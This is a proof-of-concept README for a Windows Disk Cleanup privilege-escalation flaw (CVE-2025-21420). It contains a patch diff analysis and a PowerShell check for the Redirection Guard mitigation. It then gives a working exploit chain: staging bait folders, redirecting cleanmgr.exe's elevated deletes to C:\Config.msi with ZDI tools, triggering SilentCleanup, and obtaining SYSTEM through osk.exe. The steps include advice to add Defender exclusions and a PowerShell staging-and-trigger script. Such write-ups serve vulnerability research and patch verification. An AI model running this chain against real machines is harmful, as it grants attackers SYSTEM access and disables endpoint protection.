# Proof of Concept CVE-2025-21420 (Windows Disk Cleanup Tool EoP)

## Diffing cleanmgr.exe
The patched `cleanmgr.exe` contains a call to [SetProcessMitigationPolicy](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setprocessmitigationpolicy) that the old build does not have.

`MitigationPolicy` is set to 16, which in the `PROCESS_MITIGATION_POLICY` enumeration is **ProcessRedirectionTrustPolicy**.

Combined with Microsoft classifying the bug as [CWE-59: Improper Link Resolution Before File Access ('Link Following')](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21420), this tells us the fix enables Redirection Guard in `cleanmgr.exe`: with that policy enforced the process no longer follows junctions created by a lower-integrity process, which is exactly the primitive a link-following exploit relies on. In other words, the unpatched binary followed attacker-controlled redirections while running with high privilege.
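The mitigation the diff reveals, as an added illustration written for this README (it is not code from `cleanmgr.exe` or from this repository): a PowerShell P/Invoke wrapper that enables Redirection Guard on the calling process the same way the patched binary does, and reads the policy back from any running process, so you can confirm whether the `cleanmgr.exe` started by `SilentCleanup` on a given machine is the patched build. The enum value 16, the flag layout and the Win32 signatures come from the SDK headers; the function names `Enable-RedirectionGuard` and `Get-RedirectionGuard` are this example's own.

```powershell
# Added example for this README: the Redirection Guard policy that the patched
# cleanmgr.exe sets on itself, plus a read-back check against a live process.
$Native = @'
using System;
using System.Runtime.InteropServices;
public static class RedirectionGuard {
    // PROCESS_MITIGATION_POLICY value seen in the diff: ProcessRedirectionTrustPolicy
    public const int ProcessRedirectionTrustPolicy = 16;
    // PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY is a DWORD of flags (winnt.h):
    public const uint EnforceRedirectionTrust = 0x1;   // bit 0
    public const uint AuditRedirectionTrust   = 0x2;   // bit 1
    public const uint PROCESS_QUERY_INFORMATION = 0x0400;

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool SetProcessMitigationPolicy(int MitigationPolicy, ref uint lpBuffer, UIntPtr dwLength);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool GetProcessMitigationPolicy(IntPtr hProcess, int MitigationPolicy, ref uint lpBuffer, UIntPtr dwLength);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
}
'@
Add-Type -TypeDefinition $Native

function Enable-RedirectionGuard {
    # Same call the patched cleanmgr.exe makes on itself. Assumption: like the
    # other process mitigations, enforcement is one-way once set, so only call
    # this in a throwaway PowerShell process.
    [uint32]$flags = [RedirectionGuard]::EnforceRedirectionTrust
    $ok = [RedirectionGuard]::SetProcessMitigationPolicy([RedirectionGuard]::ProcessRedirectionTrustPolicy, [ref]$flags, [UIntPtr]::new([uint32]4))
    if (-not $ok) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        # 87 (ERROR_INVALID_PARAMETER) means this Windows build has no Redirection Guard at all.
        throw "SetProcessMitigationPolicy failed, Win32 error $err"
    }
}

function Get-RedirectionGuard {
    # Reads ProcessRedirectionTrustPolicy from another process. Querying the
    # elevated cleanmgr.exe spawned by SilentCleanup needs an elevated shell,
    # otherwise OpenProcess fails with access denied (5).
    param([Parameter(Mandatory)][int]$ProcessId)
    $h = [RedirectionGuard]::OpenProcess([RedirectionGuard]::PROCESS_QUERY_INFORMATION, $false, $ProcessId)
    if ($h -eq [IntPtr]::Zero) {
        throw "OpenProcess($ProcessId) failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        [uint32]$flags = 0
        $ok = [RedirectionGuard]::GetProcessMitigationPolicy($h, [RedirectionGuard]::ProcessRedirectionTrustPolicy, [ref]$flags, [UIntPtr]::new([uint32]4))
        if (-not $ok) {
            throw "GetProcessMitigationPolicy failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
        }
        [pscustomobject]@{
            ProcessId = $ProcessId
            Enforce   = [bool]($flags -band [RedirectionGuard]::EnforceRedirectionTrust)
            Audit     = [bool]($flags -band [RedirectionGuard]::AuditRedirectionTrust)
        }
    } finally {
        [void][RedirectionGuard]::CloseHandle($h)
    }
}

# Usage while SilentCleanup is running, from an elevated prompt:
#   Get-Process cleanmgr | ForEach-Object { Get-RedirectionGuard -ProcessId $_.Id }
# A patched build reports Enforce=True; the vulnerable build reports False.
```

Note that on builds that predate Redirection Guard both calls fail with `ERROR_INVALID_PARAMETER` (87); that is a different state from "policy present but not enforced", which is what the vulnerable `cleanmgr.exe` shows on a build that does support the policy.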
Two earlier posts point the way, one by *Simon Zuckerbraun* of ZDI and one by *enigma0x3*:
1. [From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)
2. [Bypassing UAC on Windows 10 using Disk Cleanup](https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/)
The `SilentCleanup` scheduled task runs `cleanmgr.exe` with **Run with highest privileges**, which should give it enough privilege to delete `C:\Config.msi`, the folder Zuckerbraun's technique needs removed. All that remains is to find an *arbitrary folder delete/move/rename* primitive inside the `SilentCleanup` run and redirect it to `C:\Config.msi`.
## Observations via Procmon
Run the `SilentCleanup` task and watch `cleanmgr.exe` in Procmon.

The process first checks whether the folders listed exist. Interestingly, it does not check whether `C:\ESD` itself is a junction, although it does check the `Windows` and `Download` subfolders (not covered further here).
Create the folders `C:\$Windows.~WS`, `C:\ESD\Windows` and `C:\ESD\Download`, drop a few random files into them, rerun `SilentCleanup` and watch again.

`SilentCleanup` deletes the contents of the `Windows` and `Download` folders. A folder-contents delete is enough: it can be turned into a full folder delete with the technique described in [From Folder Contents Delete to SYSTEM EoP](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks).
## Exploit
1. The Python script creates three folders, `C:\$Windows.~WS`, `C:\ESD\Windows` and `C:\ESD\Download`, drops dummy `.txt` files into them and pauses.
2. Run [FolderOrFileDeleteToSystem](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs) to stage `C:\Config.msi`.
3. Run [FolderContentsDeleteToFolderDelete](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs) to redirect the content cleanup of `C:\ESD\Windows` to `C:\Config.msi`.
**Note:** Add Defender exclusions for these two tools first; the technique is detected as malicious.
4. Resume the Python script and run `SilentCleanup` to trigger the content cleanup.
5. Run `osk.exe`, then press Ctrl-Alt-Delete.
Demo video: https://github.com/user-attachments/assets/d66b43ea-6706-4bce-94c4-ca3a6e97857f
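The staging and trigger part of steps 1 and 4, together with the Procmon observation above, as an added PowerShell example written for this README. It is not the repository's `CVE-2025-21420_POC.py`, and it does not replace the ZDI tools in steps 2 and 3, which do the junction redirection and the `Config.msi` work. It stages the three bait folders with dummy files, prints how the task is configured, fires `SilentCleanup`, waits for it to finish, and lists which bait files `cleanmgr.exe` removed. The function names and the `bait<N>.txt` file names are this example's own; `\Microsoft\Windows\DiskCleanup\SilentCleanup` is the stock Windows task.

```powershell
# Added example for this README: stage bait folders, trigger SilentCleanup and
# report what cleanmgr.exe deleted. Run it from the user context you intend to
# trigger the task from; it does not perform the Config.msi redirection itself.
$TaskPath = '\Microsoft\Windows\DiskCleanup\'
$TaskName = 'SilentCleanup'
# Folders cleanmgr.exe probes (see the Procmon section); the contents of the
# two ESD subfolders are what it deletes.
$BaitFolders = @('C:\$Windows.~WS', 'C:\ESD\Windows', 'C:\ESD\Download')

function New-BaitFiles {
    # Creates each folder and drops a few dummy files in it; returns their paths.
    param([string[]]$Folders, [int]$PerFolder = 3)
    $files = foreach ($dir in $Folders) {
        New-Item -ItemType Directory -Path $dir -Force | Out-Null
        foreach ($i in 1..$PerFolder) {
            $path = Join-Path -Path $dir -ChildPath "bait${i}.txt"
            Set-Content -LiteralPath $path -Value ('dummy content ' * 8)
            $path
        }
    }
    return $files
}

function Show-TaskPrincipal {
    # Shows the RunLevel ("Highest" is what makes the deletes privileged) and
    # the exact cleanmgr.exe command line the task runs.
    $task = Get-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName
    $action = $task.Actions[0]
    "{0}: RunLevel={1}, action='{2} {3}'" -f $TaskName, $task.Principal.RunLevel, $action.Execute, $action.Arguments
}

function Invoke-SilentCleanup {
    # Starts the task and blocks until cleanmgr.exe has exited.
    Start-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName
    do {
        Start-Sleep -Seconds 2
        $state = (Get-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName).State
    } while ($state -eq 'Running')
}

Show-TaskPrincipal
$staged = New-BaitFiles -Folders $BaitFolders
Invoke-SilentCleanup
# Anything missing now was deleted by the elevated cleanmgr.exe. On the
# vulnerable build this is the delete that the ZDI tool redirects to Config.msi.
$deleted = @($staged | Where-Object { -not (Test-Path -LiteralPath $_) })
"Deleted by cleanmgr.exe: {0} of {1}" -f $deleted.Count, $staged.Count
$deleted
```

Expect the files under `C:\ESD\Windows` and `C:\ESD\Download` to be gone and the ones under `C:\$Windows.~WS` to survive, matching the Procmon trace; `-LiteralPath` is used throughout because `$Windows.~WS` would otherwise be mangled by wildcard and variable expansion.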
## Repository layout

```text
[4.0K] /data/pocs/3b706c924a91c1be9b7c86ed5fc60e96ae25c1f6
├── [ 482] CVE-2025-21420_POC.py
├── [4.0K] images
│   ├── [6.4K] diff-ghidra.png
│   ├── [ 24K] diff.png
│   ├── [ 66K] enum-PROCESS_MITIGATION_POLICY.png
│   ├── [ 22M] exploit.mp4
│   ├── [ 29K] procmon1.png
│   ├── [ 22K] procmon2.png
│   └── [ 24K] taskelevation.png
└── [3.0K] README.md

1 directory, 9 files
```